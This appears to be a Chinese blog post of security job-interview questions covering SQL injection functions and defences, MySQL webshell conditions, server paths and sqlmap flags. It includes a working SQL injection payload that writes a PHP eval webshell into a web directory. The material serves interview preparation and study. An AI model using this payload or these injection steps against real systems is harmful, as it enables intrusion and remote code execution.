网络安全相关面试题(hw)

  • 网络安全面试题

    • 报错注入有哪些函数
      • updatexml注入

        • 载荷注入

        • insert注入

        • updata注入

        • delete注入

      • extractvalue()注入

    • 注入防御方法
      • 涵数过滤

      • 直接下载相关防范注入文件,通过incloud包含放在网站配置文件里面

      • PDO预处理,从PHP 5.1开始,php可以通过PDO的prepare预处理函数执行sql语句

    • mysql写webshell注入点需要哪些条件
      • 需要知道远程web目录

      • 需要知道MySQL root权限

      • 需要知道远程目录有写入权限

      • 需要数据库开启secure_file_priv 相当于secure_file_priv的值为空,不为空不充许写入webshell (默认不开启,需要修改mysql.ini配置文件)

    • 数据库注入常见的函数
      • database()、user()、version()、system()、concat()

        • database这个函数返回当前正在连接的数据库名

        • 提供当前数据库会话的用户名

        • 返回数据库服务器的版本信息

        • 可以用来执行操作系统级别的命令

        • concat这个函数用于连接多个字符串或表达式

    • mysql数据库的账号密码保存在哪里
      • 数据库最高权限是root 密码保存在数据库user表中;密码条用musql 5特有的加密,cmd5解密

    • apache的默认路径
      • /etc/apache2/httpd.conf 或

      • /etc/httpd/conf/httpd.conf

    • apache的日志文件路径
      • Linux

        • 错误日志:/var/log/apache2/error.log

        • 访问日志:/var/log/apache2/access.log

      • Windows(假设Apache安装在默认的C:\Apache24目录下)

        • 错误日志:C:\Apache24\logs\error.log

        • 访问日志:C:\Apache24\logs\access.log

    • mysql4与5的注入区别
      • MySQL 4版本数据库由于存在着字符转义与不支持字句查询的情况,因此在注入攻击上存在着很大的局限性,只能采用类似Access的方法进行查询猜解。 首先,利用order by获得当前表的字段数,再使用union select联合查询来获取想要的数据库信息。使用union select联合查询数据库时,由于不知道数据库中的表名与字段名,因此只能像Access一样直接用常见表名和字段名进行猜测判断。

      • MySQL 5版本由于information_schema库的存在,注入攻击相对来说方便了许多 通过load_file()函数来读取脚本代码或系统敏感文件内容,进行漏洞分析或直接获取数据库连接账号、密码。 通过dumpfile/outfile函数导出获取WebShell。

    • mysql写webshell的语句如何写
      • union select "<?php @eval($_POST['123']);?>",2 into outfile "C:\\phpStudy\\WWW\\123.php"+--+&Submit=Submit

    • sqlmap的post注入用什么参数
      • -r

    • sqlmap的cookie注入加什么参数
      • --level ≥2

        • 执行测试的等级(1-5,默认为1)

    • sqlmap检查user-agent和refere头用什么参数
      • --level ≥3

    • sqlmap获取表名
      • --tables -D 数据库名

    • sqlmap的get注入用什么参数
      • -u

    • sqlmap注入显示paybad
      • -v 3

    • sqlmap获取当前数据库表名
      • --current -db

    • sqlmap当前所有数据库名
      • --dbs

    • sqlmap获取字段名
      • --columns -T user(表) -D abc(库)

    • sqlmap指定参数注入
      • -p

    • sqlmap获取当前用户
      • --current-user

    • sqlmap列出数据库所有用户
      • --users

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

XLbb:

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值